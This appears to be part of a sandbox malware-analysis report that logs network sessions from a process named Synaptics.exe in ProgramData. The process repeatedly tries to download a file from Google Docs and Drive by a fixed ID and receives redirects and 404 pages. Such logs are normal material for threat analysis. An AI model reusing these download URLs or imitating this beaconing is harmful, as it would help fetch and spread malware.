                                                                                                                                                        2024-12-30 10:48:17 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:17 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 38 32 69 52 59 50 71 6e 38 75 32 38 68 76 44 63 6f 7a 42 39 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="P82iRYPqn8u28hvDcozB9w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:17 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        37192.168.2.749961142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:17 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        38192.168.2.749966142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:18 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:19 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC5I8iq2-FymV487rp7AMr1OKl2h_fFfSbadES__PYRxVgMPt_eqn5gn8mX2G0YID1GX
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:18 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-AxYkkwW1RFqbhBvLU9FXSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:19 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:19 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 44 5a 41 4f 72 37 73 50 6f 71 33 55 2d 51 4a 53 7a 4d 2d 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="jDZAOr7sPoq3U-QJSzM-Ig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:19 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        39192.168.2.749962142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:18 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg
                                                                                                                                                        2024-12-30 10:48:18 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:18 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Ooz-IAEQ5QHMu439pUWFwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        40192.168.2.749965142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:18 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:19 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7waJcEVsFm7yWuAecR2ImABYhUMctvZFS8bYAMU3PFSf8AFTu07n-UV_72mLEmP6pu
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:19 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-kKsgcgLe4BMiGndcy36ReA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:19 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:19 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 6c 42 56 42 4c 58 68 4e 47 42 63 6f 30 4a 58 30 59 70 76 69 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="UlBVBLXhNGBco0JX0YpviA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:19 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        41192.168.2.749963142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:18 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                                                                                                                                        2024-12-30 10:48:19 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:18 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-jZj12F3yN_qEh3Q7EIaomA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        42192.168.2.749977142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:19 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                                                                                                                                        2024-12-30 10:48:19 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:19 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-SugqnpClGaplE156KkOsbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        43192.168.2.749979142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:19 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:20 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4QkSJ7-dDZV8A6Y0lQ4_E3x9Aj5rRDV8M1wVyAokm0sezSQqxyGKDavb4BN2vmoqbu
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:19 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-AgOKDP1o0SBVbyS_DaFN6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:20 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:20 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 37 5f 4d 5a 4a 36 6b 76 45 30 4b 59 76 77 37 73 7a 50 47 53 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="37_MZJ6kvE0KYvw7szPGSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
